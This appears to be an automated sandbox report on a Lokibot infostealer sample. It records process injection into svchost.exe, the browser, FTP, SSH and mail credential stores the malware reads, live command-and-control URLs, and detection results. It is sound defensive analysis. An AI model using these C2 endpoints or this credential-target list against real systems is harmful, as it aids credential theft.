                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_01274678 mov eax, dword ptr fs:[00000030h]0_2_01274678
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_01275C68 mov eax, dword ptr fs:[00000030h]0_2_01275C68
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_01275CC8 mov eax, dword ptr fs:[00000030h]0_2_01275CC8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3060 mov eax, dword ptr fs:[00000030h]1_2_00DA3060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3060 mov eax, dword ptr fs:[00000030h]1_2_00DA3060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3060 mov eax, dword ptr fs:[00000030h]1_2_00DA3060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3060 mov eax, dword ptr fs:[00000030h]1_2_00DA3060
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA4410 mov eax, dword ptr fs:[00000030h]1_2_00DA4410
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA4410 mov eax, dword ptr fs:[00000030h]1_2_00DA4410
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3540 mov eax, dword ptr fs:[00000030h]1_2_00DA3540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3540 mov eax, dword ptr fs:[00000030h]1_2_00DA3540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA3540 mov eax, dword ptr fs:[00000030h]1_2_00DA3540
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA56A0 mov eax, dword ptr fs:[00000030h]1_2_00DA56A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA56A0 mov ecx, dword ptr fs:[00000030h]1_2_00DA56A0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA4610 mov eax, dword ptr fs:[00000030h]1_2_00DA4610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA4610 mov eax, dword ptr fs:[00000030h]1_2_00DA4610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA4610 mov eax, dword ptr fs:[00000030h]1_2_00DA4610
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA4610 mov eax, dword ptr fs:[00000030h]1_2_00DA4610
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_008380A9
                  Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080A124 SetUnhandledExceptionFilter,0_2_0080A124
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0080A155
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA5848 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00DA5848
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,1_2_00DA33C0

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.64.1 80Jump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 20B008Jump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_008387B1 LogonUserW,0_2_008387B1
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007E3B3A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007E48D7
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00844C27 mouse_event,0_2_00844C27
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TXzf0xX2uq.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00837CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00837CAF
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0083874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0083874B
                  Source: TXzf0xX2uq.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: TXzf0xX2uq.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_0080862B cpuid 0_2_0080862B
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00814E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00814E87
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00821E06 GetUserNameW,0_2_00821E06
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00813F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00813F3A
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_007E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007E49A0
                  Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Lokibot
                  Source: Yara matchFile source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: TXzf0xX2uq.exe PID: 8516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8532, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000001.00000002.1371818090.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1371480582.0000000000821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: PopPassword1_2_0040D069
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: SmtpPassword1_2_0040D069
                  Source: TXzf0xX2uq.exeBinary or memory string: WIN_81
                  Source: TXzf0xX2uq.exeBinary or memory string: WIN_XP
                  Source: TXzf0xX2uq.exeBinary or memory string: WIN_XPe
                  Source: TXzf0xX2uq.exeBinary or memory string: WIN_VISTA
                  Source: TXzf0xX2uq.exeBinary or memory string: WIN_7
                  Source: TXzf0xX2uq.exeBinary or memory string: WIN_8
                  Source: TXzf0xX2uq.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 0.2.TXzf0xX2uq.exe.1ec0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00856283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00856283
                  Source: C:\Users\user\Desktop\TXzf0xX2uq.exeCode function: 0_2_00856747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00856747
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA6AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00DA6AF0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA6BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00DA6BB0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00DA6B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,1_2_00DA6B60

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts                  		1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		3
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Service Execution                  		2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		21
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		1
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt3
                  Windows Service                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		2
                  Credentials in Registry                  		1
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		NTDS117
                  System Information Discovery                  		Distributed Component Object Model21
                  Input Capture                  		113
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script3
                  Windows Service                  		1
                  Masquerading                  		LSA Secrets241
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                  Process Injection                  		2
                  Valid Accounts                  		Cached Domain Credentials21
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                  Process Injection                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  TXzf0xX2uq.exe79%ReversingLabsWin32.Infostealer.LokiBot
                  TXzf0xX2uq.exe71%VirustotalBrowse
                  TXzf0xX2uq.exe100%AviraTR/AD.LokiBot.usvro

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://touxzw.ir/tking3/five/fre.php100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  touxzw.ir
                  		104.21.64.1
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://kbfvzoboss.bid/alien/fre.phpfalse
                      		high
                      http://touxzw.ir/tking3/five/fre.phptrue
                      • Avira URL Cloud: malware
                      		unknown
                      http://alphastand.win/alien/fre.phpfalse
                        		high
                        http://alphastand.trade/alien/fre.phpfalse
                          		high
                          http://alphastand.top/alien/fre.phpfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.ibsensoftware.com/svchost.exe, svchost.exe, 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              		high

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.21.64.1
                              		touxzw.irUnited States
                              		13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1634548
                              Start date and time:2025-03-11 01:18:37 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 5m 0s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:TXzf0xX2uq.exe
                              renamed because original name is a hash value
                              Original Sample Name:5cb3d5d5e66657ffe6aa4b6819b8f885364a801c01353369f2fbc37a81d250ce.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 56
                              • Number of non-executed functions: 289
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.149.20.212, 150.171.28.10, 20.109.210.53
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, g.bing.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              20:19:33API Interceptor2x Sleep call for process: svchost.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              104.21.64.1begin.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                              • www.kdrqcyusevx.info/z84n/
                              Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exeGet hashmaliciousLokibotBrowse
                              • touxzw.ir/fix/five/fre.php
                              Payment.exeGet hashmaliciousLokibotBrowse
                              • touxzw.ir/sccc/five/fre.php
                              7RryusxiMtHBz80.exeGet hashmaliciousLokibotBrowse
                              • touxzw.ir/sss2/five/fre.php
                              Request for quotation -6001845515-XLSX.exeGet hashmaliciousLokibotBrowse
                              • touxzw.ir/tking3/five/fre.php
                              vsf098633534.exeGet hashmaliciousLokibotBrowse
                              • touxzw.ir/sccc/five/fre.php
                              laser.ps1Get hashmaliciousFormBookBrowse
                              • www.lucynoel6465.shop/jgkl/
                              UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                              • www.shlomi.app/t3l4/
                              QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                              • www.arryongro-nambe.live/ljgq/
                              QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                              • www.askvtwv8.top/2875/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              touxzw.irJOB NO. AIQ8478.bat.exeGet hashmaliciousLokibotBrowse
                              • 104.21.112.1
                              Bill_of_Lading_20250307_pdf.bat.exeGet hashmaliciousLokibotBrowse
                              • 104.21.48.1
                              PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                              • 104.21.80.1
                              Shipment_Docus_COSCO_20250307_35405649_pdf.bat.exeGet hashmaliciousLokibotBrowse
                              • 104.21.112.1
                              Payment Record.exeGet hashmaliciousLokibotBrowse
                              • 104.21.16.1
                              Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exeGet hashmaliciousLokibotBrowse
                              • 104.21.64.1
                              ORDER-000291-XLSX.exeGet hashmaliciousLokibotBrowse
                              • 104.21.112.1
                              Quotation_Order_Request_pdf.bat.exeGet hashmaliciousLokibotBrowse
                              • 104.21.112.1
                              PRI_VTK250419A.exeGet hashmaliciousLokibotBrowse
                              • 104.21.32.1
                              Payment.exeGet hashmaliciousLokibotBrowse
                              • 104.21.64.1

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSb3fXKxy96q.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.48.1
                              z0VHyUwtBk.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 104.21.48.1
                              Loader.exeGet hashmaliciousLummaC StealerBrowse
                              • 188.114.96.3
                              IyaoiEZEqZ.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              85e047k8bQ.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.48.1
                              QcFyYAdvys.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.32.1
                              ghDiLilbKo.exeGet hashmaliciousSnake KeyloggerBrowse
                              • 188.114.97.3
                              JY9Pom7YpC.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.32.1
                              1j3PbYTjxr.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 104.21.64.1
                              Q8jgBrxI7M.exeGet hashmaliciousDarkTortilla, MSIL Logger, MassLogger RATBrowse
                              • 104.21.48.1

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\Keily

                              Download File
                              Process:C:\Users\user\Desktop\TXzf0xX2uq.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):106496
                              Entropy (8bit):7.414729547534895
                              Encrypted:false
                              SSDEEP:3072:0PiTZVAfJPejcky/qE7H5zkcViGHfpXS2YK:0SZVCQ8q0zktGHBXS2z
                              MD5:A705A4C139F8D9B5398DBB384A087BA0
                              SHA1:880A1266C3A329CF8E62698E86C84A54286587F4
                              SHA-256:D1ABE172F84C2CDB6AAF39E020F64C8924B4655F467ABF48851BC86119ECE286
                              SHA-512:73D38544F9F0D4AE844BFCCE606969BF72568A459DEEC0D0B659280B656D1BA4594AB34CFC47CDF8EFD50501292915E9E5F16A483D00277FD9447EFD0D222B50
                              Malicious:false
                              Reputation:low
                              Preview:...Q6CVAOCS3.OI.5CVAKCSs2XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVA.CS3<G.GQ.J.`.B....' ".3$.,12^.;.'?Z7v#.c!F\x&'qq..a&,7V.UBCu5CVAKCS.. ...#...]..$.....W...x..._...O...E..j...U...U...N......]..%...G......%.e}....@.vq....Y..\ >..U.32XOIQ5C..KC.26X.A=bCVAKCS32.OJP>BZAK{R32.GIQ5CV.rBS3"XOI.4CVA.CS#2XOKQ5FV@KCS32]OHQ5CVAKcY32\OIQ5CVCKC.32HOIA5CVA[CS#2XOIQ5SVAKCS32XOIQ..WA/CS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XO.P5.VAKCS32XOIQ5CVAKCS32XOIQ5CVo?&+G2XO.g4CVQKCS.3XOMQ5CVAKCS32XOIQ.CV!e17RF9OI1uCVA.BS3pXOIm4CVAKCS32XOIQ5.VA.m7RF9OIQ..^AK.R32ZOIQKBVAKCS32XOIQ5C.AK.}K2XOIQ5CvAKCS92XoIQ5.WAKCS32XOIQ5CVAKC.32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS32XOIQ5CVAKCS3

                              C:\Users\user\AppData\Local\Temp\autD30D.tmp

                              Download File
                              Process:C:\Users\user\Desktop\TXzf0xX2uq.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):79456
                              Entropy (8bit):7.952251677073178
                              Encrypted:false
                              SSDEEP:1536:I+RznAqVEnDRsgE2lW68e++AMKxHXQugyvyVI9qrxCErG:jzan82lW69++dygKxqYEi
                              MD5:D8B4DBF7E7B1F158423AF30B58D0F660
                              SHA1:A1A90A38599CEF91552B334BDDC592C1D1DFE7A6
                              SHA-256:08384D26C63533CA82BCDB19A70BDFDA821FED9C1FF9EC9B22F74227C434CD6A
                              SHA-512:98EFF08F5C8DCA384787ED27B059967AE6636A217591E69DC9192475800ED2A2A64574E35DA7CAAB2654F7535A4027839272781C54EE2C67BD5BD2278EEF6ECF
                              Malicious:false
                              Reputation:low
                              Preview:EA06......{5....A...s>n..I..@.J]..s.V)....nf`..N..4.Q..z.....|.Q..N.'.H..9$.Y1.W.S.t..Z..r....\.I....2.a.K&.h.V.C..'g...lx?.......y.'...f9_.....g.^:..q..8^..z.j.y;Y........w....{..........,......s.[......=.k.o=..V|.:.|.h.[j......).c.A..45......j.K..s/...v..U9........]..#.A)u....@.4...@..,u....#........M..i...`.h...w...e.*_`.o....Mc...u..&....M..@......b.M.'.b.:...1...}&cu..#` ...h.........m.'.F#..Pi~0.....R.@...Z.K..i`.....3..b...p...?.L.G.&......x.s....)~.(...V9....iC...d.4......Q..uq..) .........\. .d...4..]&.5..&.\.....f..2f];........|...s:}C.[.42.Z]..;.V&T.L..p...p.4.Y=...*L..ee..j3Y.{.S..>..}..HO(..H.....a.>...>......NcC....:..eW.b;..U#.....{..L...H....o2.q........p.........AA.:.K........7.nfu.~.#...N.;..S......{.........;..l....d.H.r.uy....f.<5....K..~.I(..-....I..p.z..h..S...-..A.r.`.G..S..r.V..M.Gn....-x...S.....d..~5^...Vg...n...m7...>.;.........Q.<NE..p.r.`.Dc....@#....t.:T...V..|.......u,...$..N|..x......M.....ves.......7...nM...|.P..GX

                              C:\Users\user\AppData\Local\Temp\autD35C.tmp

                              Download File
                              Process:C:\Users\user\Desktop\TXzf0xX2uq.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9594
                              Entropy (8bit):7.6019184990708855
                              Encrypted:false
                              SSDEEP:192:c09SJLZ7jNO7sh4RlrIJ6R7ZHChK2VmFMWCQLErJ8ZzOzvtk0kr3R8gKqaQGBX8:X9SJtj097UJYPg2ZaYr3RAQGl8
                              MD5:B495BF4473CA488434C4B4283E3A97D9
                              SHA1:984837B70D8F565A82A750383E50CFCA48C4CD1D
                              SHA-256:20C28D8BE9378DC21F2F1C333105BC2C668FF32FB981B19C4C4DFCA907BF1FED
                              SHA-512:E513061B4233EB26F9D193C6C00724766F066324CF3C8FA9DE37BF7935BC55FA6C335B2CAB40014E33602C6E3B53BDB2B88B2672F2C572D92E914256156922E1
                              Malicious:false
                              Reputation:low
